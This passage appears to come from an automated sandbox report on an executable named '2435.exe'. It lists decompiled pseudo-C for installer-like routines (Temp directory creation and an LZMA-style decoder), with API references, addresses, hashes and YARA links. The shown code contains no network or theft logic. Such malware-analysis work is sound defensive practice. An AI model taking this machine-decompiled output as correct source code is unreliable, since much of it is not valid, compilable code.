						_t48 = E73352A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E733526B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x733516db
0x733516db
0x733516db
0x733516e5
0x733516ed
0x733516fa
0x73351708
0x7335170b
0x7335170d
0x73351712
0x73351717
0x73351836
0x73351836
0x7335171d
0x73351721
0x73351724
0x73351729
0x7335172b
0x73351731
0x73351737
0x73351767
0x7335176e
0x73351792
0x733517dd
0x73351794
0x73351794
0x73351795
0x7335179b
0x7335179c
0x733517a6
0x733517a9
0x733517ae
0x733517b5
0x733517b5
0x733517bc
0x733517c2
0x733517c8
0x733517d5
0x733517d6
0x733517d9
0x73351770
0x73351771
0x73351786
0x73351786
0x733517e7
0x733517ea
0x733517f7
0x733517fe
0x73351806
0x73351809
0x73351809
0x73351806
0x73351816
0x7335181e
0x73351823
0x73351816
0x7335182b
0x00000000
0x7335182d
0x00000000
0x7335182e
0x7335182b
0x7335173b
0x7335173e
0x7335175c
0x00000000
0x00000000
0x7335175f
0x73351764
0x73351764
0x73351766
0x00000000
0x73351766
0x73351740
0x73351741
0x73351749
0x7335174a
0x00000000
0x7335174a
0x73351743
0x73351744
0x73351752
0x00000000
0x73351752
0x73351747
0x00000000
0x00000000
0x00000000
0x73351747

APIs

Part of subcall function 73351A98: GlobalFree.KERNEL32 ref: 73351D09
Part of subcall function 73351A98: GlobalFree.KERNEL32 ref: 73351D0E
Part of subcall function 73351A98: GlobalFree.KERNEL32 ref: 73351D13

GlobalFree.KERNEL32 ref: 73351786
FreeLibrary.KERNEL32(?), ref: 73351809
GlobalFree.KERNEL32 ref: 7335182E

Part of subcall function 733522AF: GlobalAlloc.KERNEL32(00000040,?), ref: 733522E0

Part of subcall function 733526B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73351757,00000000), ref: 73352782

Part of subcall function 7335156B: wsprintfA.USER32 ref: 73351599

Strings

, xrefs: 7335180F

Memory Dump Source

Source File: 00000000.00000002.237544307.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000000.00000002.237538806.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237551256.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237556712.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 935b113ccb8116d0d8da1c282c3e2f84c12d260cf56d858cd4b118a7dd8e2c9d
Instruction ID: 2f214a54ac8d9ec7634ef1b3401e8d6c397dc9b6ea9ea623fed00230b5c02a51
Opcode Fuzzy Hash: 935b113ccb8116d0d8da1c282c3e2f84c12d260cf56d858cd4b118a7dd8e2c9d
Instruction Fuzzy Hash: E24160B2D003089BDF31AF78CD84F9677ACBB04215F188465F94B9A1C6DB788586CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00403208, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403208(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
				E00405DC8(_t6);
				_t2 = E004056C6(_t6);
				if(_t2 != 0) {
					E00405659(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040586C("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x00403209
0x0040320f
0x00403215
0x0040321c
0x00403221
0x00403229
0x00403235
0x0040323b
0x0040321f
0x0040321f
0x0040321f

APIs

Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\2435.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\2435.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\2435.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00403229

Strings

1033, xrefs: 00403230
C:\Users\user\AppData\Local\Temp\, xrefs: 00403209, 0040320E, 00403214, 00403220, 00403228, 0040322F

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-2030658151
Opcode ID: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
Instruction ID: 28437e5e833f6c5712a3d87292ca06883de7807d6adf700678bf42288e0e849f
Opcode Fuzzy Hash: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
Instruction Fuzzy Hash: 11D0C922656E3032C651363A3C0AFDF091C8F5271AF55847BF908B40D64B6C5A5259EF

Uniqueness

Uniqueness Score: -1.00%

Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406566() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004069D4))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
